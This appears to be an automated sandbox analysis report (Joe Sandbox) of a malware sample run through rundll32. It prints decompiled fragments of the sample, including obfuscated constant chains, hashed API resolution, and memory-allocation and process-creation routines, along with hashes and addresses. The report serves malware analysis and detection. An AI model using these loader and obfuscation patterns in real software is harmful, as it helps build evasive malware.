                                                                                                                                                                            				_v12 = 0xeb975;
                                                                                                                                                                            				_v12 = _v12 ^ 0xd8138edb;
                                                                                                                                                                            				_v12 = _v12 | 0x0b4171d5;
                                                                                                                                                                            				_v12 = _v12 ^ 0xdb5d9300;
                                                                                                                                                                            				E0474EB52(__ecx, __ecx, 0xb7160725, 0x75, 0xa2289af1);
                                                                                                                                                                            				_t56 = CreateProcessW(_a52, _t60, 0, 0, _a24, 0, 0, 0, _a32, _a56); // executed
                                                                                                                                                                            				return _t56;
                                                                                                                                                                            			}













                                                                                                                                                                            0x04762c2c
                                                                                                                                                                            0x04762c31
                                                                                                                                                                            0x04762c33
                                                                                                                                                                            0x04762c36
                                                                                                                                                                            0x04762c37
                                                                                                                                                                            0x04762c3a
                                                                                                                                                                            0x04762c3d
                                                                                                                                                                            0x04762c3e
                                                                                                                                                                            0x04762c41
                                                                                                                                                                            0x04762c44
                                                                                                                                                                            0x04762c47
                                                                                                                                                                            0x04762c4a
                                                                                                                                                                            0x04762c4b
                                                                                                                                                                            0x04762c4e
                                                                                                                                                                            0x04762c4f
                                                                                                                                                                            0x04762c51
                                                                                                                                                                            0x04762c52
                                                                                                                                                                            0x04762c57
                                                                                                                                                                            0x04762c61
                                                                                                                                                                            0x04762c64
                                                                                                                                                                            0x04762c67
                                                                                                                                                                            0x04762c6e
                                                                                                                                                                            0x04762c72
                                                                                                                                                                            0x04762c76
                                                                                                                                                                            0x04762c7d
                                                                                                                                                                            0x04762c84
                                                                                                                                                                            0x04762c8b
                                                                                                                                                                            0x04762c92
                                                                                                                                                                            0x04762c99
                                                                                                                                                                            0x04762ca0
                                                                                                                                                                            0x04762ca4
                                                                                                                                                                            0x04762cab
                                                                                                                                                                            0x04762cb2
                                                                                                                                                                            0x04762cb9
                                                                                                                                                                            0x04762cc0
                                                                                                                                                                            0x04762cc7
                                                                                                                                                                            0x04762ce8
                                                                                                                                                                            0x04762d02
                                                                                                                                                                            0x04762d09

                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateProcessW.KERNELBASE(?,2E751909,00000000,00000000,00534833,00000000,00000000,00000000,?,?), ref: 04762D02
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254208432.0000000004741000.00000020.00000001.sdmp, Offset: 04740000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254203541.0000000004740000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254227760.0000000004766000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_4740000_rundll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                                            • String ID: 3HS
                                                                                                                                                                            • API String ID: 963392458-330188696
                                                                                                                                                                            • Opcode ID: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
                                                                                                                                                                            • Instruction ID: 70ff4158c9e88fedec6e47c64c32aa91e45826784b4fc5d543b8cedee6400e84
                                                                                                                                                                            • Opcode Fuzzy Hash: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
                                                                                                                                                                            • Instruction Fuzzy Hash: 0921F572800248BBCF159F96DC0ACDFBFB9EF85704F508148F91562220C3B59A24DFA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 230 100021d0-100021e0 231 100021e2-100021e7 230->231 232 100021ec-100021f8 230->232 233 100022ec-100022ef 231->233 234 10002254-100022b6 232->234 235 100021fa-10002205 232->235 236 100022c4-100022e1 VirtualProtect 234->236 237 100022b8-100022c1 234->237 238 10002207-1000220e 235->238 239 1000224a-1000224f 235->239 240 100022e3-100022e5 236->240 241 100022e7 236->241 237->236 242 10002210-1000221e 238->242 243 10002232-10002244 VirtualFree 238->243 239->233 240->233 241->233 242->243 244 10002220-10002230 242->244 243->239 244->239 244->243
                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                            			E100021D0(intOrPtr __ecx, intOrPtr* _a4, void** _a8) {
                                                                                                                                                                            				long _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				int _t67;
                                                                                                                                                                            
                                                                                                                                                                            				_v28 = __ecx;
                                                                                                                                                                            				if(_a8[2] != 0) {
                                                                                                                                                                            					if((_a8[3] & 0x02000000) == 0) {
                                                                                                                                                                            						asm("sbb ecx, ecx");
                                                                                                                                                                            						_v16 =  ~( ~(_a8[3] & 0x20000000));
                                                                                                                                                                            						asm("sbb eax, eax");
                                                                                                                                                                            						_v24 =  ~( ~(_a8[3] & 0x40000000));
                                                                                                                                                                            						asm("sbb edx, edx");
                                                                                                                                                                            						_v12 =  ~( ~(_a8[3] & 0x80000000));
                                                                                                                                                                            						_t39 = _v24 * 8; // 0x10056f20
                                                                                                                                                                            						_v20 =  *((intOrPtr*)((_v16 << 4) + _t39 + 0x10056f20 + _v12 * 4));
                                                                                                                                                                            						if((_a8[3] & 0x04000000) != 0) {
                                                                                                                                                                            							_v20 = _v20 | 0x00000200;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t67 = VirtualProtect( *_a8, _a8[2], _v20,  &_v8); // executed
                                                                                                                                                                            						if(_t67 != 0) {
                                                                                                                                                                            							return 1;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							return 0;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					if( *_a8 == _a8[1] && (_a8[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x30) || _a8[2] %  *(_a4 + 0x30) == 0)) {
                                                                                                                                                                            						VirtualFree( *_a8, _a8[2], 0x4000); // executed
                                                                                                                                                                            					}
                                                                                                                                                                            					return 1;
                                                                                                                                                                            				}
                                                                                                                                                                            				return 1;
                                                                                                                                                                            			}










                                                                                                                                                                            0x100021d6
                                                                                                                                                                            0x100021e0
                                                                                                                                                                            0x100021f8
                                                                                                                                                                            0x10002262
                                                                                                                                                                            0x10002266
                                                                                                                                                                            0x10002276
                                                                                                                                                                            0x1000227a
                                                                                                                                                                            0x1000228b
                                                                                                                                                                            0x1000228f
                                                                                                                                                                            0x1000229b
                                                                                                                                                                            0x100022a8
                                                                                                                                                                            0x100022b6
                                                                                                                                                                            0x100022c1
                                                                                                                                                                            0x100022c1
                                                                                                                                                                            0x100022d9
                                                                                                                                                                            0x100022e1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100022e3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100022e3
                                                                                                                                                                            0x100022e1
                                                                                                                                                                            0x10002205
                                                                                                                                                                            0x10002244
                                                                                                                                                                            0x10002244
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000224a
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,?,00004000,?,10002468,00000001,00000000,?,10002C68,?,?,?,?,10002C68,00000000,00000000), ref: 10002244
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FreeVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1263568516-0
                                                                                                                                                                            • Opcode ID: 47f32b032b7fce0672a30d9b107070a1881b22e5365e79d9d7a5c7562cbc9459
                                                                                                                                                                            • Instruction ID: def7816fd77fd5aef653724919a03fde70f7e86383ff2ba96e4cf8bb5acc80b5
                                                                                                                                                                            • Opcode Fuzzy Hash: 47f32b032b7fce0672a30d9b107070a1881b22e5365e79d9d7a5c7562cbc9459
                                                                                                                                                                            • Instruction Fuzzy Hash: 5A41B674600109AFEB44CF98C890BA9B7B6FB88350F25C659EC1A9F395C731EE41CB94
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 245 1001a305-1001a323 HeapCreate 246 1001a325-1001a327 245->246 247 1001a328-1001a335 call 1001a2aa 245->247 250 1001a337-1001a344 call 1001a57a 247->250 251 1001a35b-1001a35e 247->251 250->251 254 1001a346-1001a359 HeapDestroy 250->254 254->246
                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E1001A305(intOrPtr _a4) {
                                                                                                                                                                            				void* _t6;
                                                                                                                                                                            				intOrPtr _t7;
                                                                                                                                                                            				void* _t10;
                                                                                                                                                                            
                                                                                                                                                                            				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                                                                                            				 *0x1005ad4c = _t6;
                                                                                                                                                                            				if(_t6 != 0) {
                                                                                                                                                                            					_t7 = E1001A2AA(__eflags);
                                                                                                                                                                            					__eflags = _t7 - 3;
                                                                                                                                                                            					 *0x1005c984 = _t7;
                                                                                                                                                                            					if(_t7 != 3) {
                                                                                                                                                                            						L5:
                                                                                                                                                                            						__eflags = 1;
                                                                                                                                                                            						return 1;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t10 = E1001A57A(0x3f8);
                                                                                                                                                                            						__eflags = _t10;
                                                                                                                                                                            						if(_t10 != 0) {
                                                                                                                                                                            							goto L5;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							HeapDestroy( *0x1005ad4c);
                                                                                                                                                                            							 *0x1005ad4c =  *0x1005ad4c & 0x00000000;
                                                                                                                                                                            							goto L1;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					L1:
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            			}






                                                                                                                                                                            0x1001a316
                                                                                                                                                                            0x1001a31e
                                                                                                                                                                            0x1001a323
                                                                                                                                                                            0x1001a328
                                                                                                                                                                            0x1001a32d
                                                                                                                                                                            0x1001a330
                                                                                                                                                                            0x1001a335
                                                                                                                                                                            0x1001a35b
                                                                                                                                                                            0x1001a35d
                                                                                                                                                                            0x1001a35e
                                                                                                                                                                            0x1001a337
                                                                                                                                                                            0x1001a33c
                                                                                                                                                                            0x1001a341
                                                                                                                                                                            0x1001a344
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001a346
                                                                                                                                                                            0x1001a34c
                                                                                                                                                                            0x1001a352
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001a352
                                                                                                                                                                            0x1001a344
                                                                                                                                                                            0x1001a325
                                                                                                                                                                            0x1001a325
                                                                                                                                                                            0x1001a327
                                                                                                                                                                            0x1001a327

                                                                                                                                                                            APIs
                                                                                                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,1001796A,00000001,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C), ref: 1001A316
                                                                                                                                                                            • HeapDestroy.KERNEL32(?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001A34C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Heap$CreateDestroy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3296620671-0
                                                                                                                                                                            • Opcode ID: 2498113e0f0cb93b929c98f8b50cab2ed5fb389832bb0c331937e648ce874443
                                                                                                                                                                            • Instruction ID: 8ebff57b685a6f4636b50d0b354dfd0ee4d70228ae444a146c3f0929ed30e208
                                                                                                                                                                            • Opcode Fuzzy Hash: 2498113e0f0cb93b929c98f8b50cab2ed5fb389832bb0c331937e648ce874443
                                                                                                                                                                            • Instruction Fuzzy Hash: 93E06D71A193569EFB10AB308C9972536F4EB46386F104826F911CD4A0F7B0C6C09A01
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 255 10002010-1000203e 256 10002052-1000205e 255->256 257 10002064-1000206b 256->257 258 10002156 256->258 259 100020d3-100020ee call 10001fe0 257->259 260 1000206d-1000207a 257->260 261 1000215b-1000215e 258->261 270 100020f0-100020f2 259->270 271 100020f4-10002119 VirtualAlloc 259->271 262 1000207c-1000209e VirtualAlloc 260->262 263 100020ce 260->263 265 100020a0-100020a2 262->265 266 100020a7-100020cb call 10001e10 262->266 263->256 265->261 266->263 270->261 272 1000211b-1000211d 271->272 273 1000211f-1000214e call 10001e60 271->273 272->261 273->258
                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E10002010(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                            				void* _v12;
                                                                                                                                                                            				long _v16;
                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				void* _t76;
                                                                                                                                                                            				void* _t127;
                                                                                                                                                                            
                                                                                                                                                                            				_v28 = __ecx;
                                                                                                                                                                            				_t3 = _a16 + 4; // 0x104e9
                                                                                                                                                                            				_v20 =  *_t3;
                                                                                                                                                                            				_t7 =  *_a16 + 0x14; // 0x4a8bb445
                                                                                                                                                                            				_t9 = ( *_t7 & 0x0000ffff) + 0x18; // 0x10002c17
                                                                                                                                                                            				_v24 =  *_a16 + _t9;
                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					_t17 =  *_a16 + 6; // 0xe9000001
                                                                                                                                                                            					if(_v8 >= ( *_t17 & 0x0000ffff)) {
                                                                                                                                                                            						break;
                                                                                                                                                                            					}
                                                                                                                                                                            					if( *(_v24 + 0x10) != 0) {
                                                                                                                                                                            						_t41 = _v24 + 0x14; // 0x4a8bb445
                                                                                                                                                                            						_t43 = _v24 + 0x10; // 0x8b118bbc
                                                                                                                                                                            						if(E10001FE0(_v28, _a8,  *_t41 +  *_t43) != 0) {
                                                                                                                                                                            							_t47 = _v24 + 0x10; // 0x8b118bbc
                                                                                                                                                                            							_t50 = _v24 + 0xc; // 0x4d8b0000
                                                                                                                                                                            							_t76 = VirtualAlloc(_v20 +  *_t50,  *_t47, 0x1000, 4); // executed
                                                                                                                                                                            							_v12 = _t76;
                                                                                                                                                                            							if(_v12 != 0) {
                                                                                                                                                                            								_t55 = _v24 + 0xc; // 0x4d8b0000
                                                                                                                                                                            								_v12 = _v20 +  *_t55;
                                                                                                                                                                            								_t58 = _v24 + 0x10; // 0x8b118bbc
                                                                                                                                                                            								_t61 = _v24 + 0x14; // 0x4a8bb445
                                                                                                                                                                            								E10001E60(_v12, _a4 +  *_t61,  *_t58);
                                                                                                                                                                            								_t127 = _t127 + 0xc;
                                                                                                                                                                            								 *((intOrPtr*)(_v24 + 8)) = _v12;
                                                                                                                                                                            								L1:
                                                                                                                                                                            								_v8 = _v8 + 1;
                                                                                                                                                                            								_v24 = _v24 + 0x28;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            							return 0;
                                                                                                                                                                            						}
                                                                                                                                                                            						return 0;
                                                                                                                                                                            					}
                                                                                                                                                                            					_v16 =  *((intOrPtr*)(_a12 + 0x38));
                                                                                                                                                                            					if(_v16 <= 0) {
                                                                                                                                                                            						L8:
                                                                                                                                                                            						goto L1;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t28 = _v24 + 0xc; // 0x4d8b0000
                                                                                                                                                                            					_v12 = VirtualAlloc(_v20 +  *_t28, _v16, 0x1000, 4);
                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                            						_t33 = _v24 + 0xc; // 0x4d8b0000
                                                                                                                                                                            						_v12 = _v20 +  *_t33;
                                                                                                                                                                            						 *((intOrPtr*)(_v24 + 8)) = _v12;
                                                                                                                                                                            						E10001E10(_v12, 0, _v16);
                                                                                                                                                                            						_t127 = _t127 + 0xc;
                                                                                                                                                                            						goto L8;
                                                                                                                                                                            					}
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				return 1;
                                                                                                                                                                            			}











                                                                                                                                                                            0x10002016
                                                                                                                                                                            0x1000201c
                                                                                                                                                                            0x1000201f
                                                                                                                                                                            0x1000202c
                                                                                                                                                                            0x10002030
                                                                                                                                                                            0x10002034
                                                                                                                                                                            0x10002037
                                                                                                                                                                            0x10002052
                                                                                                                                                                            0x10002057
                                                                                                                                                                            0x1000205e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000206b
                                                                                                                                                                            0x100020d6
                                                                                                                                                                            0x100020dc
                                                                                                                                                                            0x100020ee
                                                                                                                                                                            0x100020fe
                                                                                                                                                                            0x10002108
                                                                                                                                                                            0x1000210c
                                                                                                                                                                            0x10002112
                                                                                                                                                                            0x10002119
                                                                                                                                                                            0x10002125
                                                                                                                                                                            0x10002128
                                                                                                                                                                            0x1000212e
                                                                                                                                                                            0x10002138
                                                                                                                                                                            0x10002140
                                                                                                                                                                            0x10002145
                                                                                                                                                                            0x1000214e
                                                                                                                                                                            0x10002040
                                                                                                                                                                            0x10002046
                                                                                                                                                                            0x1000204f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000204f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000211b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100020f0
                                                                                                                                                                            0x10002073
                                                                                                                                                                            0x1000207a
                                                                                                                                                                            0x100020ce
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100020ce
                                                                                                                                                                            0x1000208d
                                                                                                                                                                            0x10002097
                                                                                                                                                                            0x1000209e
                                                                                                                                                                            0x100020ad
                                                                                                                                                                            0x100020b0
                                                                                                                                                                            0x100020b9
                                                                                                                                                                            0x100020c6
                                                                                                                                                                            0x100020cb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100020cb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100020a0
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,10002BFF,00000000), ref: 10002091
                                                                                                                                                                            • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10008AC6,8B118BBC,?,10002BFF,00000000,10008AC6,?), ref: 1000210C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                            • Opcode ID: 1f005b19e3c441fc20b6c29efe2afaeec2d3b558fdbd29b30d99f40439f16acf
                                                                                                                                                                            • Instruction ID: c265c5d024e1aaa08d03296b5d335ffe068feccc9d90f6e2fd2d76d71ec68577
                                                                                                                                                                            • Opcode Fuzzy Hash: 1f005b19e3c441fc20b6c29efe2afaeec2d3b558fdbd29b30d99f40439f16acf
                                                                                                                                                                            • Instruction Fuzzy Hash: 4E51DEB4A0020ADFDB04CF94C591AAEB7F1FF48344F208598E915AB355D771EE91CBA1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 277 10008860-1000887a call 1001703b 280 10008883-10008897 277->280 281 1000887c-10008881 277->281 283 100088ab-100088b2 280->283 282 100088db-100088de 281->282 284 100088b4-100088bc 283->284 285 100088be-100088c2 call 10016380 283->285 284->283 288 100088c7-100088d0 285->288 289 100088d2-100088d4 288->289 290 100088d6 288->290 289->282 290->282
                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                            			E10008860(void* __eflags) {
                                                                                                                                                                            				char* _v8;
                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                            				char _v16;
                                                                                                                                                                            				char* _v20;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				void* _t25;
                                                                                                                                                                            				void* _t29;
                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                            				void* _t33;
                                                                                                                                                                            				void* _t34;
                                                                                                                                                                            
                                                                                                                                                                            				_v8 = E1001703B(_t25, _t29, _t33, _t34, 0x5f5e100);
                                                                                                                                                                            				if(_v8 != 0) {
                                                                                                                                                                            					_v12 = 0x5f5e100;
                                                                                                                                                                            					_v16 = 0;
                                                                                                                                                                            					_v20 = _v8;
                                                                                                                                                                            					while(1) {
                                                                                                                                                                            						__eflags = _v16 - 0x5f5e100;
                                                                                                                                                                            						if(__eflags >= 0) {
                                                                                                                                                                            							break;
                                                                                                                                                                            						}
                                                                                                                                                                            						 *_v20 = _v16;
                                                                                                                                                                            						_v16 = _v16 + 1;
                                                                                                                                                                            						_t32 = _v20 + 1;
                                                                                                                                                                            						__eflags = _t32;
                                                                                                                                                                            						_v20 = _t32;
                                                                                                                                                                            					}
                                                                                                                                                                            					_push(_v8); // executed
                                                                                                                                                                            					E10016380(_t25, _t33, _t34, __eflags); // executed
                                                                                                                                                                            					__eflags = _v16 - _v12;
                                                                                                                                                                            					if(_v16 != _v12) {
                                                                                                                                                                            						return 3;
                                                                                                                                                                            					}
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				return 3;
                                                                                                                                                                            			}













                                                                                                                                                                            0x10008873
                                                                                                                                                                            0x1000887a
                                                                                                                                                                            0x10008883
                                                                                                                                                                            0x1000888a
                                                                                                                                                                            0x10008894
                                                                                                                                                                            0x100088ab
                                                                                                                                                                            0x100088ab
                                                                                                                                                                            0x100088b2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100088ba
                                                                                                                                                                            0x1000889f
                                                                                                                                                                            0x100088a5
                                                                                                                                                                            0x100088a5
                                                                                                                                                                            0x100088a8
                                                                                                                                                                            0x100088a8
                                                                                                                                                                            0x100088c1
                                                                                                                                                                            0x100088c2
                                                                                                                                                                            0x100088cd
                                                                                                                                                                            0x100088d0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100088d6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100088d2
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • _malloc.LIBCMT ref: 1000886B
                                                                                                                                                                              • Part of subcall function 1001703B: __FF_MSGBANNER.LIBCMT ref: 1001705E
                                                                                                                                                                              • Part of subcall function 1001703B: __NMSG_WRITE.LIBCMT ref: 10017065
                                                                                                                                                                              • Part of subcall function 1001703B: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562,00000001), ref: 100170B3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateHeap_malloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 501242067-0
                                                                                                                                                                            • Opcode ID: 40bd655b06e48b04370c20bd75be719fcb86c010ff12dc3827a327f63544bac9
                                                                                                                                                                            • Instruction ID: 9e6909d06ecd8ca97a2f758cde8d66f904c366c92fb4d9c13ba1bad92c8ee0bf
                                                                                                                                                                            • Opcode Fuzzy Hash: 40bd655b06e48b04370c20bd75be719fcb86c010ff12dc3827a327f63544bac9
                                                                                                                                                                            • Instruction Fuzzy Hash: 9A0178B4D0424CEFEB00CFA4C8446AEBBB4FB04354F60C8A9D9516B349E735AB00DB81
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 291 475d11a-475d1bb call 474eb52 ExitProcess
                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E0475D11A() {
                                                                                                                                                                            				unsigned int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                            				void* _t39;
                                                                                                                                                                            
                                                                                                                                                                            				_v24 = _v24 & 0x00000000;
                                                                                                                                                                            				_v36 = 0x78f5c7;
                                                                                                                                                                            				_v32 = 0xa12bb9;
                                                                                                                                                                            				_v28 = 0x4eca09;
                                                                                                                                                                            				_v8 = 0x8b256f;
                                                                                                                                                                            				_v8 = _v8 << 0xb;
                                                                                                                                                                            				_v8 = _v8 ^ 0x4a7d0011;
                                                                                                                                                                            				_v8 = _v8 >> 9;
                                                                                                                                                                            				_v8 = _v8 ^ 0x00073d60;
                                                                                                                                                                            				_v20 = 0x1e549a;
                                                                                                                                                                            				_v20 = _v20 + 0xffffad33;
                                                                                                                                                                            				_v20 = _v20 ^ 0x00134b4f;
                                                                                                                                                                            				_v16 = 0x8dd9dd;
                                                                                                                                                                            				_v16 = _v16 << 3;
                                                                                                                                                                            				_v16 = _v16 ^ 0x0460bc3c;
                                                                                                                                                                            				_v12 = 0x358059;
                                                                                                                                                                            				_v12 = _v12 + 0xb97b;
                                                                                                                                                                            				_v12 = _v12 ^ 0x003502df;
                                                                                                                                                                            				E0474EB52(_t39, _t39, 0x83891850, 0x1c, 0xa2289af1);
                                                                                                                                                                            				ExitProcess(0);
                                                                                                                                                                            			}












                                                                                                                                                                            0x0475d120
                                                                                                                                                                            0x0475d124
                                                                                                                                                                            0x0475d12b
                                                                                                                                                                            0x0475d132
                                                                                                                                                                            0x0475d139
                                                                                                                                                                            0x0475d140
                                                                                                                                                                            0x0475d144
